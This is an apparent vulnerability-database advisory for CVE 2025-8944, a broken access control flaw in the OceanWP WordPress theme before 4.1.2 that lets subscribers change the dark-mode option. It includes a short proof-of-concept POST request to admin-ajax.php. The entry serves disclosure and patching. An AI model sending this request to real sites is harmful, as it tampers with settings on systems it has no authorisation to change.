OceanWP < 4.1.2 – Subscriber+ Limited Option Update | CVE 2025-8944 | Theme Vulnerabilities

Description

The theme is vulnerable to an option update due to a missing capability check on one of its AJAX request handler, allowing any authenticated users, such as subscriber to update the darkMod` setting.

Proof of Concept

Login as Subscriber. 

Send a POST request:

```
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in=...

action=ocean_update_search_box_light_mode&darkMode=HamitCIBO-ClientSideİnjection-Salut!
```

Affects Themes

Fixed in 4.1.2

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Hamit Cibo

Submitter

Hamit Cibo

Submitter website

https://hcibo.medium.com/

Verified

Yes

WPVDB ID

cf77b7f2-525b-4fe8-b612-185a1c18c197

Timeline

Publicly Published

2025-08-15 (about 4 months ago)

Added

2025-08-15 (about 4 months ago)

Last Updated

2025-08-15 (about 4 months ago)

Other

Published

Title

Published

2025-04-24

Title

Prevent Direct Access 2.8.6 - 2.8.8.2 - Incorrect Authorization to Authenticated (Contributor+) Multiple Media Actions

Published

2025-11-18

Title

SiteSEO – SEO Simplified < 1.3.3 - Authenticated Settings Reset

Published

2021-12-20

Title

Tabs < 3.7.0 - Authenticated Arbitrary Options Update

Published

2024-06-10

Title

WPS Hide Login < 1.9.16 - Login Page Disclosure

Published

2025-11-26

Title

Folders < 3.1.6 - Incorrect Authorization to Authenticated (Contributor+) Folder Content Manipulation